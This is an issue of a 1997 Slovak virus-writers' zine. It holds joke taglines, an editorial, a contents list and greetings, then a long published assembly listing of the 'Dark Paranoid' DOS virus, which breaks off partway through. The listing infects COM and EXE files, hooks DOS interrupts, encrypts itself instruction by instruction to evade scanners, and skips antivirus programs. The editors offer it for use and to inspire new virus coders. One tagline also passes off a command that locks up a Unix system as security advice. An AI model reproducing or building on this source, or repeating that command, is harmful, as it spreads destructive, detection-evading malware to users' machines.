pesimized for IE 800x600 hicolor © 1997 *-zine crew

Hardware-independent means it doesn't run on any computer.

This mail is delivered using 100% recyclable electrons.

Have you heard about Microsoft's new crystal ball? Anything you ask, it answers: "Not enough memory, add 20MB and try again"

If God wanted humans to work with computers, he'd have equipped them with fast I/O ports.

Quadrature of a circle? Phew! Try to install Windows95!

Sex is 1 of 9 reasons for reincarnation; the other 8 are unimportant.

When the lights are out, all women are beautiful.

Virginity can be cured.

Your Hard Disc is dead, but Eddie lives!

Wanna keep your system ABSOLUTELY secured? Use: su -c "chmod -R 000 /"

File not found - Should I fake it?

What is this red button fowr9Y~~m NO CARRIER

How to double your disk drive space: Delete Windows.

Avoid hangovers: Stay drunk.

/etc/passwd: no such file or directory

Microsoft: brings power of yesterday to computers of today.

Life could be much easier if we have its source code.

#define QUESTION (2B || !2B)

// Shakespeare

This section is the finest spice which makes the mag much tastier. We bring you quality, not quantity. At least in this issue.

Dark Paranoid / Terror-6
Kyjacisko / Vyvojar
One_Half.3577 / Vyvojar
TMC:Level_6x9.A (Tiny Mutation Compiler) / Ender
WordMacro.SlovakDictator / Nasty Lamer & Ugly Luser

From the top position of the Wild list comes the famous One_Half.3577 by Vyvojar, one of the best viruses ever written. We also present the unusual virus Dark Paranoid by Terror-6, an author with innovative ideas and a very coolio style of coding. Ender, the TMC author, didn't want to release full sources due to his "love" for AVerz, so we were at least allowed to publish a description based on source code analysis and some samples of the second generation. Blesk experimented lately with archive infection and we present the results of his research. Two really "lame" macrovirus authors - The Nasty Lamer and The Ugly Luser - wrote two nice macroviruses for our mag. That would be nothing special, but those macroviruses are top elite. They have variable length, they are truly polymorphic and only one exemplar is detected by f-win. This is a quite funny story. Some 10 dayz ago the authors uploaded that one sample to cicatrix's site :) It is a very crazy idea to detect this one macro by CRC (f-win suX), or am I not right, dear Frisk???

At this time our Article section is virus oriented only (the rest of HPAV is omitted right now), just because the submissions we received are virus only. But in future issues we promise to cover not only viruses. However, who knows :-) So enjoy these articles, hope they'll bring some interesting infoz to you - there's rather a lot of stuff left to read, so go for 'em!

Stealth / mgl
Dark Avenger - the legend / mgl
End of TBAV independence / mgl
CPU opcodes / mgl
RAR'n'ARJ dropper / blesk
Story of one book / The Ziggy Zag Diary - Present future to forgotten past / The Unforgiven of Immortal Riot/Genesis

In this issue we have 4 interviews. I think that is enough for one issue. Actually, in this first issue we present only the VX side of the biz. We've selected 4 interesting people from 4 groups and two continents. We hope you'll enjoy all the questions and answers. Stuff in brackets 're comments by flush or mgl.

Interview with CoKe of VLAD
Interview with WildW0rker of RSA
Interview with Sep of IRG
Interview with MrSandman of 29A

So, everything ends sometime or somewhere. And you have, unfortunately, reached the end of our first issue. We hope all of you enjoyed the mag. To tell the truth, at some moments we lost hope the mag would ever be released. First we had a viewer but not enough articles, then we obtained high quality articles but found the viewer shitty... So we decided to use a new mag engine, The CYBERAGE. After all the problems, the zine went out (uraaaaaaaaaaaaaaaaaaaaaaaaah!!!!). We know our English is in some points quite buggy. We apologise :(((( But in the limited time we had for our work there was no opportunity to find some workaround. On the other hand, we brought you in this issue tasty and cheesy high quality viruses and some other stuff. If you enjoyed the mag, please give us some form of feedback (look at the "How to contact us" section). We need some moral support to keep us encouraged for the next issues. Do not forget, everyone has a share, everyone can contribute. flush + mgl

Dear reader, please allow me to introduce the first (and I hope not the last at the same time) issue of our zine. I hope everyone'll find in this issue at least two or three articles which'll be of some value to him.

We would like to focus our mag not only on virii, but also on the rest of the H/P/A/V. Of course, we don't want to present only our own stuff; every piece of your activity, dear reader, 'll be great. If you're the author of the ultimate, kick-the-ass virus or utility, or just want to tell your latest experiences or opinions to the rest of the community, contact us! We would like to make your stuff public. Remember, not everyone is a virus&asm guru, so we'll bring some stuff which for some of you dudes could be trivial or lame. But for someone it could be a good example or even the inspiration for their own start as a vx coder. Last but not least, we'll try to bring some interesting background stories and infos, some virus history related articles and more ...

Why is this zine named '*'? Well, we got several explanations. Just choose your favourite one. '*' in computer terms stands for wildcard - the sign that covers everything. '*', whose ASCII code is 42, was the international dial code for Slovakia, the origin of the editors of this zine. However, nowadays we got a new dial code, 421 :( '*', the number 42, is the answer to the ultimate question of life, the universe and everything.

This little section is very important. If we forget to include your name, don't worry about it. We apologise for such an omission, but on the other hand, who cares?

Personal greetings - Virus section

Sep-IRG, TuIRG, QuantumG, Ww0rker, Mr.Sandman, Dark Avenger, lovinGOD, Dark Angel, yurik, Tornado, avd, Ender, Online, Nasty Lamer & Ugly Luser, _COKe_, Vyvojar, Blesk, kdkd, qark, rebyc

- if we meet personally, we'll land in the next pub
- thanx for your great contribution
- your Unix page is gr8t
- how do you feel as fresh married ? :-P
- 29A - isn't MiG some fighter ?
- can i get some nukes ? And how was the stay on Hawai ?
- long live the legend !
- it's really hard to meet you on #virus
- was nice to meet you
- well, it didn't work out, let's try one more time
- are you alive ?
- TMC is really a kick-the-ass virus
- awaiting your next virus
- yu'v kewl style of coding
- you kicked the fwin's ass :))))
- keep da VLAD alive !!! And cheers !
- how did you find us ???
- sorry for the viewer. But thiz1 is1ly real the best from all 'round the world
- 777 !
- thanx for sending me VLAD in the past
- hope my mail'll reach yer mbox. And be ready for the anti M$ stuff

Dark Paranoid
This is another elite contribution to our zine. So, after some time has passed since the release of this beautiful piece of code, we can present it to the virus community. I would like to express my unlimited thanx to the author for allowing me to publish the source code. The coder of Dark Paranoid, known under the handle Terror-6, is one of the young Slovak programmers who are continuing the work of Vyvojar - bringing to the world new, never before seen viruses of the finest Slovak quality. So far, according to available information, Terror-6 is working on something, but no one knows what it is. But we can hope it will be some wild thing.

And now, let's talk about Dark Paranoid. This is a very unusual com'n'exe file infecting resident virus. The approximate length of the code appended to the target file is about 6 kB. When infecting COM files, Dark Paranoid'll place its own code at the start of the file and the original contents of the file'll be moved behind the viral body. EXEs are infected as usual: the virus is appended to the end of the file and the header'll be manipulated to point to the virus. But what makes Dark Paranoid so unusual is its polymorphism. This virus is polymorphic even in memory. At every moment, only one instruction of the virus is unencrypted. After execution of this instruction, INT 1 occurs. The handler of INT 1'll re-encrypt the executed instruction and decrypt the next one. The decrypted instruction'll be executed and encrypted again. And this is the principle of Dark Paranoid's "ENGINE OF ETERNAL ENCRYPTION". If you think that the INT 1 handler could be used as a possible scanstring, you are so hopeless and crap ... .

When the author spent such an amount of time and beer to code such a beautiful virus, and then allowed it to be caught in memory with a simple scanstring, he'd be a big jerk. So, dear AVerz and dear virus friends, the handler is slightly polymorphic. On every installation to memory this handler is changed.

The virus avoids infecting files whose names start with 'AV', 'SC', 'CL', 'GU', 'NO', 'FV', 'TO', 'TB'. In plain text, Dark Paranoid'll not infect AVP, SCAN, CLEAN, GUARD, NOD (but ICE'll be infected :(((( ), FINDVIRUS, TOOLKIT and TBAV. Dark Paranoid'll also avoid infecting baits and goats.

Dark Paranoid contains a payload - it prints the text Dark Paranoid on the screen and shakes the screen.

Finally, all I have to say is - enjoy the code.



; compile to COM then run it. .MODEL tiny .CODE .186 begin: org 100h virlen heaplen datalen len_range d_len actionc MAXinst b_d len WRITE_LEN write_len_exe com_len REQUEST_MEM C_head ss_distance MAXCOM gb_len HEADERLEN decr_code vSP SS_to_CS TF start: old_enable: ENABLE: push push push popf equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ equ (offset endv-offset begin) (offset heapend-offset heapbeg) (offset dataend-offset heapbeg) 1001 offset d_end-offset d_beg 4096 8 40h virlen+heaplen virlen+datalen virlen+(offset data_12e-offset heapbeg) write_len-100h (len)/16+1 offset C_aft-offset start 512 65535 offset gb_end-offset gb_mem 20h offset gb_mem-offset start 200h (write_len_exe+len_range)/16+1 300h

ds di 0

xor di,di mov ds,di e1: e2: mov di,cs:[engine__] xchg word ptr ds:[01*4],di mov word ptr cs:[old1],di mov di,cs xchg word ptr ds:[01*4+2],di mov word ptr cs:[old1+2],di pop di pop ds push push ent_: push eA: offset start_v TF cs


mov cs:[oldptr],offset rcpt iret old_engine:



pusha mov bp,sp push ds push cs pop ds e5: mov si,cs:[oldptr] ec_oldx: nop eng2: mov si,[bp+16] dc_oldx: nop e6: mov word ptr cs:[oldptr],si pop ds popa eng_iret: iret old_disable: DISABLE: push ds push di xor di,di mov ds,di e8: mov di,word ptr cs:[old1] mov ds:[4],di mov di,word ptr cs:[old1+2] mov ds:[6],di pop di pop ds Iret org 300h C_aft: gb_mem: old1 dd engine__ dw oldptr dw k1 dw ? k2 dw ? k3 dw ? gb_end: org 400h pred start_v:

? offset ENGINE ?

db MAXinst dup (?) nop push es push pop ds cs

jmp IDENTIFY action: mov mov mov mov mov mov mov mov mov mov mov

ax,0b800h ds,ax si,160*12+60 byte ptr [si],'D' byte ptr [si+2],'a' byte ptr [si+4],'R' byte ptr [si+6],'K' byte ptr [si+8],' ' byte ptr [si+10],'P' byte ptr [si+12],'A' byte ptr [si+14],'R'


mov mov mov mov mov

byte byte byte byte byte

ptr ptr ptr ptr ptr

[si+16],'a' [si+18],'N' [si+20],'O' [si+22],'i' [si+24],'D'

xor cx,cx ddd: push cx

mov ax,3 call random mov ah,80 mul ah mov bl,al mov ax,5 call random add al,80-2 add al,bl mov ah,al mov al,0dh mov dx,3d4h out dx,al xchg al,ah inc dx out dx,al mov dl,0b4h xchg ah,al out dx,al inc dx xchg ah,al out dx,al mov and or out dx,61h al,002h al,30h dx,al

pop cx dec cx jnz ddd retn

ALLOC: mov ah,50h mov bx,8 int 21h nop mov ah,48h mov bx,REQUEST_MEM int 21h nop pushf push ax mov bx,es mov ah,50h int 21h nop


pop ax popf retn ACCESS: mov ax,5800h int 21h nop mov [UMB_strategy],ax mov ax,5802h int 21h nop mov ah,0 mov [UMB_link],ax mov ax,5801h mov bx,0041h ; umb - best fit int 21h nop mov ax,5803h mov bx,1 int 21h nop retn

UNACCESS: push ax mov bx,[UMB_link] mov ax,5803h ; restore chain int 21h nop mov ax,5801h ; restore strategy mov bx,[UMB_strategy] int 21h nop pop ax retn gen_preint: mov ax,6 call random add al,0f8h mov byte ptr [INT_21],al retn IDENTIFY: mov ah,2ah int 21h nop call cr_data add cx,dx mov dx,cs INSTALL_TO_MEM: call ACCESS call ALLOC pushf call UNACCESS popf jnc mem_ok LOW_INSTALL: mov ax,4a00h+'¨' mov bx,-1 int 21h nop mov ah,4ah sub bx,REQUEST_MEM+1 int 21h nop


call ALLOC jnc mem_ok push es pop ds int 20h nop mem_ok: mov es,ax COPY: cld push cs pop ds xor si,si xor di,di mov cx,write_len/2+1 rep movsw

HIGHz: rl2:

push pop ds


mov ax,offset temp_int_21 mov di,word ptr [ent__] mov [di],ax ; entry point call init_random GET_VECTORZ: push 0 pop ds mov ax,ds:[4*21h] mov bx,ds:[4*21h+2] mov word ptr es:[old_21],ax mov word ptr es:[old_21+2],bx mov ax,cs:[bitch] mov word ptr ds:[4*21h],ax mov word ptr ds:[4*21h+2],es mov byte ptr es:[TEMP_INT_21],90h mov es,dx push cs pop ds call gen_preint ; don't think it ends so soon. ; so much things to do.

mov ah,4ch int 21h TEMP_INT_21: nop add sp,6

push ds push cs pop ds mov di,[old1_ofs] mov ax,word ptr es:[di] mov word ptr ds:[di],ax mov ax,word ptr es:[di+2] mov word ptr ds:[di+2],ax MAKE_HEAP: xor ax,ax


mov [create],ax mov ax,offset int_21 mov di,word ptr [ent__] mov [di],ax

push es pusha call morph push 0 pop ds mov ax,cs:[bitch] mov word ptr ds:[4*21h],ax popa pop es ds RETURN: mov ax,ss cmp ax,dx je COM_RETURN

EXE_RETURN: pop es mov cx,es add cx,10h mov bx,[old_ss] add bx,cx add [old_cs],cx mov ax,[old_sp] sub ax,sp mov ss,bx add sp,ax push push push 200h word ptr [old_cs] word ptr [old_ip]

call entry_regs jmp take_off_2 entry_regs: xor si,si xor di,di xor ax,ax xor bx,bx xor cx,cx xor dx,dx push es pop ds retn COM_RETURN: mov mov mov add cld rep

cx,[block_len] si,[block_beg] di,100h si,di movsb


pop es call


push 200h push es push 100h jmp take_off_2 TAKE_OFF_2: pusha push ds push cs pop ds mov al,byte ptr [dis_val] mov byte ptr [rcpt],al pop ds popa push push push push iret ena_pop: int_21: nop ah,5bh ; create new file crt ah,3ch v001 cmp cs:[create],0 jne jin call executable jnz JUMP_INT21 call hookold INT 21h ; come get some push ds push cs pop ds jc done mov [create],ax call rehook push si mov si,sp push ss pop ds push ax lahf mov [si+8],ah pop ax pop si pop ds jmp take_off_2 cmp je cmp jne crt: cmp ax,6c00h v002 dl,10h ok6c dl,12h JUMP_INT21 cs:[disable__] 0 cs offset rcpt

jin: cr_co:


v001: jne cmp je cmp jne



cmp cs:[create],0 jne JUMP_INT21 xchg si,dx call executable xchg si,dx jnz JUMP_INT21 test bl,2 jnz cr_co push ax cx push bx and bl,0fch inc bl inc bl call hookold INT 21h nop call rehook pop bx jnc cr_2 pop cx ax jmp JUMP_INT21 add sp,4 push ds push cs pop ds mov [create],ax jmp done cmp ah,3eh v003 cs:[create],bx v003 INFECT_ cmp ax,5800h ID_OK


v002: jne cmp jne jmp v003: je

JUMP_INT21: push 0 push word ptr cs:[old_21+2] push word ptr cs:[old_21] jmp TAKE_OFF_2


push ax ds es push 0 pop ds push cs pop es mov ax,word ptr cs:[old_21] xchg ax,ds:[21h*4] mov es:[hook21],ax mov ax,word ptr cs:[old_21+2] xchg ax,ds:[21h*4+2] mov es:[hook21+2],ax pop es ds ax retn push ax ds push 0 pop ds mov ax,cs:[hook21]



mov ds:[21h*4],ax mov ax,cs:[hook21+2] mov ds:[21h*4+2],ax pop ds ax retn


push push cs pop ds mov mov mov mov pop jmp

ax ds

ax,word ptr [safe] word ptr [rcpt],ax al,[safe+2] byte ptr [rcpt+2],al ds ax rcpt

ID_OK: push ax push dx cx call hookold mov ah,2ah int 21h nop call rehook mov ax,cx add ax,dx pop cx dx cmp ax,cx pop ax jne JUMP_INT21 add sp,8 jmp return EXECUTABLE: cld mov mov i002: cmp je cmp jne yepa: nopa: jnz mov mov and and cmp je cmp je cmp je cmp je cmp je cmp pusha si,dx bx,dx lodsb al,'\' yepa al,':' nopa mov bx,si or al,al i002 ax,[bx] bl,[bx+2] ax,0dfdfh bl,0dfh ax,'VA' ex_2 ax,'CS' ex_2 ax,'LC' ex_2 ax,'UG' ex_2 ax,'ON' ex_2 ax,'VF'

; AV[*] ; SCAN ; CLEAN ; GUARD (of eden ? ) ; NOD ? ; ???


je cmp je cmp je inc cmp jne mov sksm: cmp jne inc cmp jne mov skasm:

ex_2 ax,'OT' ex_2 ax,'BT' ex_2 al al,'Z'+1 sksm al,'A' al,ah namvspb ah ah,'Z'+1 skasm ah,'A'

; toolkit ; tbav

cmp bl,ah je ex_2 namvspb: mov mov or or cmp jne cmp je i003: ex_2: ex_en: ax,[si-3] bl,[si-4] ax,2020h bl,20h ax,'ex' i003 bl,'e' ex_en cmp ax,'mo' jne ex_en cmp bl,'c' popa retn jmp i_ec pusha push push call push pop es push pop ds


ds es hookold cs cs

i001: TIMESTAMP: mov ax,5700h INT 21H nop mov al,cl and al,1fh dec al jnz ts_1 jmp BAD_TIME ts_1: push cs pop ds mov [time],cx mov [date],dx READ_BUFFER: call seekstart mov dx,offset buffer mov cx,HEADERLEN


mov ah,3fh INT 21h nop jc i_error cmp ax,cx jne i_error call random0 mov byte ptr [int_21],al mov ax,len_range call random mov [len_add],ax mov ax,actionc call random cmp ax,111h jne noact pusha push ds call action pop ds popa noact: mov cmp je cmp jne e_i_2: isi: add add add add add ax,word ptr [buffer] ax,'MZ' E_I_2 ax,'ZM' COM_INFECT jmp EXE_INFECT push si [disable__],ax [ent__],ax [dc_old],ax [dco_end],ax [bitch],ax

mov si,[__old_1] add [si+4],ax pop si retn cni: jmp CAN_NOT_INFECT seekend

COM_INFECT: call or jnz cmp ja mov call

dx,dx CNI ax,maxCOM-COM_Len CNI [block_beg],ax seekstart

push bx call ACCESS mov ah,48h mov bx,(COM_len+d_len+1+len_range)/16 INT 21h pop bx jnc canal jmp CAN_NOT_ALLOCATE


canal: mov cx,COM_len add cx,[len_add] mov [temp_seg],ax mov ds,ax xor dx,dx mov ah,3fh INT 21h nop push cs pop ds mov [block_len],ax push ax call seekstart

mov si,[ent__] push [si] mov word ptr [si],offset start_v mov dx,[bitch] mov ax,100h sub ax,dx push ax call isi mov cx,C_head mov ah,40h call x_21 mov dx,offset C_aft mov cx,COM_len add cx,[len_add] cmp [block_beg],cx jae long_c mov [block_beg],cx long_c: sub cx,[len_add] sub cx,d_len+C_head mov ah,40h call cr_data call x_21 call cr_data add [len_add],d_len call write_add pop ax neg ax call


pop [si] call seekend pop cx xor dx,dx mov ds,[temp_seg] mov ah,40h INT 21h nop push pop es ds


mov ah,49h INT 21h nop push cs pop ds push cs pop es CAN_NOT_ALLOCATE: call UNACCESS CAN_NOT_INFECT: mov cx,[time] mov dx,[date] mov ax,5701h and cl,0e0h or cl,al INT 21h nop BAD_TIME: i_ec: mov [create],0 call rehook call gen_preint pop es pop ds popa jmp JUMP_INT21 Exe_Header EH_Signature EH_Modulo EH_Size EH_Reloc EH_Size_Header EH_Min_Mem EH_Max_Mem EH_SS EH_SP EH_Checksum EH_IP EH_CS eh_1st_reloc eh_ovl Exe_Header STRUC dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? dw ? ENDS

; close

; Set to 'MZ' or 'ZM' for .exe files ; remainder of file size/512 ; file size/512 ; Number of relocation items ; Size of header in paragraphs ; Minimum paragraphs needed by file ; Maximum paragraphs needed by file ; Stack segment displacement ; Stack Pointer ; Checksum, not used ; Instruction Pointer of Exe file ; Code segment displacement of .exe ; first relocation item ; overlay number

EXE_INFECT: push cs pop es mov si,offset buffer+EH_SS cmp byte ptr [si+18h-EH_SS],40h je i_ec cmp word ptr [si+eh_ovl-EH_SS],0 ; no evrs. jne i_ec cmp byte ptr [si+eh_max_mem-EH_SS+1],7 jbe i_ec mov di,offset old_SS cld movsw movsw lodsw ; skip checksum movsw movsw


call seekend SET_EXE_HEAD: push ax dx mov cx,200h div cx dec ax cmp word ptr [buffer+EH_size],ax pop dx ax jb i_ec EI03: push ax dx and al,0fh jz no_add mov cx,10h sub cl,al mov ax,0b000h call random xchg dx,ax mov ah,40h INT 21h nop pop dx ax add ax,cx adc dx,0 jmp short yes_add pop dx ax push ax dx cx,16 cx dx,[bitch] word ptr [buffer+EH_IP],dx ax,word ptr [buffer+EH_Size_Header] word ptr [buffer+EH_CS],ax

no_add: yes_add: mov div mov mov sub mov

add ax,SS_to_CS mov word ptr [buffer+EH_SS],ax mov ax,900h call random add ah,2 mov al,0 mov word ptr [buffer+EH_SP],ax pop dx ax add adc add adc mov div mov or jz inc EI01: ax,[len_add] dx,0 ax,write_len_exe dx,0 cx,200h cx word ptr [buffer+EH_Modulo],dx dx,dx EI01 ax mov word ptr [buffer+EH_Size],ax mov si,[ent__] push [si] mov word ptr [si],offset start_v xor dx,dx mov cx,write_len_exe mov ah,40h


call cr_data call x_21 call cr_data pop [si] call write_add

jnc EI02 jmp CAN_NOT_INFECT EI02: call mov mov mov INT nop seekstart dx,offset buffer cx,headerlen ah,40h 21h

seekend: se_c:

jmp CAN_NOT_INFECT mov ax,4202h xor cx,cx xor dx,dx INT 21h retn

seekstart: mov ax,4200h jmp short se_c fake_seg: mov ax,0fa00h call random mov ds,ax mov al,byte ptr ds:[0] cmp al,byte ptr ds:[1] je fake_seg mov al,byte ptr ds:[len_range-6] cmp al,byte ptr ds:[len_range-8] je fake_seg retn write_add: call fake_seg mov cx,cs:[len_add] xor dx,dx mov ah,40h INT 21h nop push cs pop ds retn retn cr_ax equ offset cr_block+2

cr_randomize: mov di,offset cr_ax mov cx,6 cr_lop: movsw scasw scasb movsw scasw scasb


dec cx jnz cr_lop retn cr_data: push si mov si,offset heapbeg macro num db 81h,74h,&num,0,0 endm


cr_block: db 81h,34h,0,0 xorsi 2 xorsi 4 xorsi 6 xorsi 8 xorsi 10 xorsi xorsi xorsi xorsi xorsi xorsi pop si retn dil_ck: stosw xchg ax,bx stosw xchg ax,cx stosw xchg ax,dx stosw xchg ax,si stosw retn 12 14 16 18 20 22

; ????

dil_gen: mov di,offset getlost mov ax,08b2eh mov bx,0026h+256*(255 and (offset sp_tmp-offset begin)) mov cx,0bf00h+(offset sp_tmp-offset begin) shr 8 mov dx,offset rcpt mov si,0f78bh call dil_ck mov ax,0df8bh mov bx,04c6h mov cx,0ffc3h mov dx,0016h+256*(255 and (offset ec_new-offset begin)) mov si,8a00h+(offset ec_new-offset begin) shr 8 call dil_ck mov ax,0a204h mov bx,offset dis_val mov cx,05c7h mov dx,21cdh mov si,45c6h call dil_ck mov ax,0c302h mov bx,16ffh mov cx,offset ec_new


mov dx,368bh mov si,offset ecn_end call dil_ck mov ax,048fh mov bx,00beh+256*(255 and (offset new_enable-offset begin)) mov cx,8b00h+(offset new_enable-offset begin) shr 8 mov dx,0003eh+256*(255 and (offset bitch-offset begin)) mov si,0b900h+(offset bitch-offset begin) shr 8 call dil_ck mov ax,decr_code/2 mov bx,0a5f3h mov cx,0c033h mov dx,0c08eh mov si,368bh call dil_ck mov ax,offset m1 mov bx,8926h mov cx,0436h mov dx,8b00h mov si,00036h+256*(255 and (offset __old_1-offset begin)) call dil_ck mov ax,0c700h+(offset __old_1-offset begin) shr 8 mov bx,0644h mov cx,offset pred mov dx,00068h+256*(255 and TF) mov si,0e00h+(TF) shr 8 call dil_ck mov ax,00068h+256*(255 and (offset getlost_po-offset begin)) mov bx,02e00h+(offset getlost_po-offset begin) shr 8 mov cx,36ffh mov dx,offset m1 mov si,0c6c3h call dil_ck mov ax,0c304h mov bx,0c726h mov cx,0406h mov dx,0000h+256*(255 and (offset reCrypt-offset begin)) mov si,0c700h+(offset reCrypt-offset begin) shr 8 call dil_ck mov ax,0006h+256*(255 and (offset oldptr_2-offset begin)) mov bx,(offset oldptr_2-offset begin) shr 8+256*(255 and (offset pred+1-offset begin )) mov cx,05500h+(offset pred+1-offset begin) shr 8 mov dx,0ec8bh mov si,1f0eh call dil_ck mov ax,070eh mov bx,368bh mov cx,offset oldptr_2 mov dx,0fe8bh mov si,0de8bh call dil_ck mov ax,16ffh mov bx,offset ec_new mov cx,0fe81h mov dx,offset END_offset mov si,0372h call dil_ck mov ax,07be9h mov bx,2bffh mov cx,0276h mov dx,0def7h


mov si,0ce8bh call dil_ck mov ax,0e981h mov bx,0008h mov cx,0d9f7h mov dx,0c681h mov si,offset rcpt call dil_ck mov ax,7e8bh mov bx,0f302h mov cx,8ba4h mov dx,0276h mov si,000bfh+256*(255 and (offset rcpt-offset begin)) call dil_ck mov ax,0a500h+(offset rcpt-offset begin) shr 8 mov bx,0a5a5h mov cx,8ba5h mov dx,0276h mov si,0fe8bh call dil_ck mov ax,0de8bh mov bx,16ffh mov cx,offset dc_old mov dx,3689h mov si,offset oldptr_2 call dil_ck mov ax,048bh mov bx,0cd3ch mov cx,3a74h mov dx,0f3ch mov si,3774h call dil_ck mov ax,703ch mov bx,0472h mov cx,7f3ch mov dx,2f76h mov si,08e3dh call dil_ck mov ax,74d3h mov bx,3c28h mov cx,7461h mov dx,3d27h mov si,0f1f7h call dil_ck mov ax,2174h mov bx,0c33ch mov cx,1e74h mov dx,0ee3ch mov si,1a74h call dil_ck mov ax,0cf3ch mov bx,1574h mov cx,0eb3ch mov dx,1174h mov si,0e83ch call dil_ck mov ax,0c74h mov bx,0e93ch mov cx,0874h mov dx,0ff3dh mov si,74d0h call dil_ck


mov ax,0eb04h mov bx,460ah mov cx,4646h mov dx,8946h mov si,0276h call dil_ck mov ax,073e9h mov bx,33ffh mov cx,033f6h mov dx,033ffh mov si,0a1dbh call dil_ck mov ax,offset empty_seg mov bx,0d88eh mov cx,0c08eh mov dx,0c033h mov si,0cf5dh jmp dil_ck POWERUP: push cs pop es cld call fake_seg xor si,si mov di,offset new_enable mov cx,decr_code/2 rep movsw push cs pop ds

mov [__entry],offset int_21 mov ax,101h call random mov [bitch],ax add ax,offset old_enable-offset new_enable-100h mov [b2],ax

call random_g_mem mov [__old_1],ax add ax,4 mov [__engine],ax add ax,2 mov [__oldptr],ax add ax,2 mov [__ks],ax mov di,offset new_enable call gen_enable mov ax,b_d call random add di,ax mov [m1],di mov ax,[b2] add [m1],ax call push pop ds gen_engine cs


mov ax,b_d call random add di,ax mov ax,[b2] mov [disable__],di add [disable__],ax call gen_disable retn decision: push ax mov ax,2 call random pop ax retn random0: call random mov ax,cs:[rseed] retn

init_random: pusha push ds xor ax,ax mov ds,ax xor ax,ds:[046ch] xor ax,ds:[3456h] xor ax,ds:[7354h] pop ds mov word ptr [rseed],ax mov ah,2ah int 21h nop xor dx,ds:[046eh] xor dx,ds:[8*4+2] xor dx,ds:[2354h] mov word ptr [rseed+2],ax popa retn

random: push ds push cs pop ds mov word ptr [rtemp],ax push bx cx dx mov ax,word ptr [rseed] mov bx,word ptr [rseed+2] mov cx,ax mov dx,8405h mul dx shl cx,3 add ch,cl add dx,cx add dx,bx shl bx,2 add dx,bx add dh,bl shl bx,5 add dh,bl add ax,1


adc dx,0 mov word ptr [rseed],ax mov word ptr [rseed+2],dx mov cx,dx mul word ptr [rtemp] mov ax,cx mov cx,dx mul word ptr [rtemp] xchg ax,dx add dx,cx adc ax,0 pop dx cx bx ds or ax,ax retn CSs equ 0Eh DSs equ 1Eh ESs equ 06h SSs equ 16h t_mem equ 0 t_const equ 1 t_reg equ 2 t_stack equ 3 t_seg equ 4 random_grow equ 3 MK equ 0cccch mc_const struc mcc_type db db ? mcc_val dw mc_const ends

? ?

mc_mem struc mcm_type db ? mcm_seg db ? mcm_ofs dw ? mc_mem ends GET_TAB: push dx mov al,[si] mov dl,5 mul dl add al,[si+4] shl ax,2 add ax,offset cross_tab call ax or ax,ax pop dx retn COMPILER: comp_l: call GET_TAB je co_bad push si call ax pop si mov cmp jne cmp jne ax,[si+4] al,t_reg cll ah,[indy] cll


dec [lock_ind] cll: co_ok: add si,8 cmp byte ptr [si],0ffh jne comp_l retn


mov al,90h stosb jmp co_ok RECURSER: mov [si],ax mov [si+2],bx mov [si+4],cx mov [si+6],dx call ROOP add si,8 retn ROOP: call GET_TAB jz must_go mov ax,random_grow call random jnz roop_end must_go: mov ax,[si+4] mov [si+8+4],ax mov ax,[si+6] mov [si+8+6],ax ro_l: mov ax,4 call random mov [si+4],al cmp al,t_reg jne ro_lz cmp [lock_reg],0 je ro_l ro_lz: cmp al,t_stack jne ro_lx cmp word ptr [si],t_reg+4*256 je ro_l ro_lx: call GET_TAB jz ro_l mov al,[si+4] cmp al,t_mem je garbage_mem cmp al,t_reg je garbage_reg garbage_ret: mov [si+4],ax ; destination mov [si+6],bx mov [si+8],ax mov [si+10],bx add si,8 jmp ROOP roop_end: retn garbage_reg: mov ah,[use_reg] jmp garbage_ret garbage_mem: call random_g_mem mov bx,[__old_1] dec bx sub bx,ax ja gm_ok add bx,9


jns garbage_mem gm_ok: xchg ax,bx mov ax,CSs*256+t_mem jmp garbage_ret CROSS_TAB: mov ax,0 retn mov ax,0 retn mov ax,offset mem2reg retn mov ax,offset mem2stack retn mov ax,offset mem2seg retn mov ax,offset const2mem retn mov ax,0 retn mov ax,offset const2reg retn mov ax,0 retn mov ax,0 retn mov ax,offset reg2mem retn mov ax,0 retn mov ax,offset reg2reg retn mov ax,offset reg2stack retn mov ax,offset reg2seg retn mov ax,offset stack2mem retn mov ax,0 retn mov ax,offset stack2reg retn mov ax,0 retn mov ax,offset stack2seg retn mov ax,offset seg2mem retn mov ax,0 retn mov ax,offset seg2reg retn mov ax,offset seg2stack retn mov ax,0 retn mem2reg: mov al,[si].mcm_seg call drop_prefix mov al,8Bh ; mov reg16,[mem16] mov ah,[si+4+1] shl ah,3


jmp orah mem2stack: mov al,[si].mcm_seg call drop_prefix mov ax,30ffh ; push [mem16] jmp orah

mem2seg: mov al,[si].mcm_seg call drop_prefix mov al,08Eh ; mov seg,[mem16] mov ah,[si+4+1] sub ah,6 jmp orah const2mem: lodsw lodsw

; add si,4


mov al,[si].mcm_seg call drop_prefix mov ax,00c7h call orah mov ax,[si-4].mcc_val cmp ax,MK jne cm_ok mov [ent__],di mov ax,[b2] add [ent__],ax mov ax,[__entry] stosw retn

const2reg: mov al,[si+4+1] cmp [si].mcc_val,0 jne c2r2 mov dl,9 mul dl xchg ah,al call decision jz c2r3 or ax,0c033h ; xor reg,reg jmp c2rc c2r3: or ax,0c02bh ; sub reg,reg jmp c2rc c2r2: add al,0B8h ; mov reg16,imm16 stosb mov ax,[si].mcc_val stosw retn lodsw lodsw ; add si,4 mov al,[si].mcm_seg call drop_prefix mov al,89h ; mov [mem16],reg16 mov ah,[si-4+1] shl ah,3




jmp orah reg2reg: mov ah,[si+4+1] cmp ah,[si+1] je r2r_ shl ah,3 or ah,[si+1] or ah,0c0h mov al,8bh stosw retn


reg2stack: mov al,[si+1] add al,50h stosb retn reg2seg: mov al,08eh mov ah,[si+4+1] add ah,[si+1] add ah,0c0h-6 stosw retn

; push reg16

; mov seg,reg16


stack2mem: lodsw lodsw mov al,[si].mcm_seg call drop_prefix mov ax,008fh ; pop [mem16] jmp orah stack2reg: mov al,[si+4+1] add al,58h ; pop reg16 stosb retn stack2seg: mov al,[si+4+1] inc al stosb retn seg2mem: lodsw lodsw mov al,[si].mcm_seg call drop_prefix mov al,08ch ; mov seg,[mem16] mov ah,[si+1-4] sub ah,6 jmp orah

seg2reg: mov al,08ch mov ah,[si+1] add ah,[si+4+1] add ah,0c0h-6 stosw retn seg2stack: mov al,[si+1] ; mov seg,reg16


